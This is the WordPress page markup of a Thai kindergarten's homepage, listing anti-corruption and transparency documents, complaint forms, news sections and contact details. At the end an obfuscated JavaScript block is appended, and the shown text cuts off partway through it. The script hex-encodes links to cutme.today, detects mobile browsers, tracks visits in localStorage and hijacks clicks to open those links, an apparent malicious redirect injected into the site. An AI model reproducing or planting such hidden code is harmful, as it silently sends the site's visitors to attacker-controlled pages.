{\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 